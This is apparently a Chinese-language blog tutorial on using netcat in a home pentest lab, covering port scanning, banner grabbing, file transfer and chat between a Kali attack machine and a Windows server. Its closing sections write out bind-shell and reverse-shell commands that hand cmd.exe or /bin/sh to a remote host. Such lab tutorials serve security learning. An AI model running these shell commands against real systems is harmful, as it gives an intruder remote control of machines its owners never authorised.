内网工具netcat的使用(附内网环境实现)

前言

netcat是一款功能比较丰富的一个内网工具,可以进行端口转发、获取shell、传输文件,甚至可以聊天等等,功能非常强大,又被称为“瑞士军刀”,又或者直接说nc

natcat常用命令:

-d:后台模式
-e:程序重定向
-g:设置路由器跃程通信网关,最多可以设置8个
-G::设置源路由指向器的数量,值为4的倍数
-h:在线帮助
-i:设置时间间隔,以便传送信息及扫描通信端口
-l:使用监听模式,管理和控制传入的数据
-n:直接使用IP地址(不通过域名服务器)
-o:指定文件名称,把往来传输的数据转换为十六进制字节码后保存在该文件中
-p:这是本地主机使用的通信端口
-r:随机指定本地与远程主机的通信端口
-s:设置本地主机送出的数据包的IP地址
-u:使用UDP传输协议
-v:详细输出
-w:设置等待连线的时间
-z:将输入/输出功能关闭,只在扫描通信端口是使用

nc基本功能环境实现

网络环境:
内网工具netcat的使用(附内网环境实现)_第1张图片
目标:nc基本功能实现
使用机器:kali 攻击机(192.168.206.131)以及Windows 2008 R2 内网web服务器(192.168.206.129)
(1)端口扫描
在kali攻击机中,扫描指定web服务器端命令:
nv -v 192.168.206.129 445
在这里插入图片描述
但是,不只有只扫描一个主机端口,还有扫描范围的命令:
nc -v -z 192.168.206.129 20-2000
内网工具netcat的使用(附内网环境实现)_第2张图片
这就看出目标主机开启了445以及139和135端口
(2)Banner信息抓取
Banner信息包含了服务的信息,版本信息等等,比较详细,所以我们放在第二个讲,当我们探测端口存活之后,我们想知道目端口包含了什么信息,可以使用如下命令:
nc -nv 192.168.206.129 445
在这里插入图片描述
(3)端口监听
监听本地端口,当有人访问这个端口时就可以获取到数据包,并显示到命令行
第一步:kai攻击机:nc -l -p 9999
然后,目标主机访问了该端口之后就有如下:
目标主机显示:
内网工具netcat的使用(附内网环境实现)_第3张图片

kali攻击机显示:
在这里插入图片描述
(4)文件传输
第一步:目标主机:nc -lp 333>1.txt
在这里插入图片描述
第二步:kali攻击机:nc -vn 192.168.206.129 333 在这里插入图片描述
在这里插入图片描述
(备注,需要在同一个目录下面,才可以把我们要想的输入的内容输入到目标中,要不然会在当前目录下产生一个新的文件)
(5)简易聊天
目标主机设置:
第一步:nc -l -p 8888
kali设置:
第二步:nc -vn 192.168.206.129 8888
即可,效果如图
在这里插入图片描述
在这里插入图片描述

(6)正向shell
shell的命令分为linux、windows
nc -lvp 4444 -e /bin/sh //linux
nc -lvp 4444 -e c:\WINDOWS\system32\cmd.exe //windows
是指我们主动连接目标主机
kali攻击机:
第二步:nc 192.168.206.129 4444
目标主机(我们的是windows,所以使用windows 的nc命令):
第一步:nc -lvp 4444 -e c:\WINDOWS\system32\cmd.exe
效果如图:
在这里插入图片描述
内网工具netcat的使用(附内网环境实现)_第4张图片

(7)反向shell
是指目标服务器主动连接我们的主机,这个在对于一个防护措施的绕过有一定的作用
kali:
第一步:nc -lvp 9999
目标主机:
第二步:nc 192.168.206.131 9999 -e c:\WINDOWS\system32\cmd.exe
即可,效果如图
内网工具netcat的使用(附内网环境实现)_第5张图片
在这里插入图片描述

总结

nc功能很强大,有很多我们需要自己去分析,实践出真理,也有目标主机没有nc的情况下这么获取shell,有很多,但是,我们是windows系统,所以,有些环境需要多做才能总结出对自己以及各位师傅们的有用的东西,还是那一句,能帮助到各位师傅的,不胜荣幸

你可能感兴趣的:(内网攻防,网络)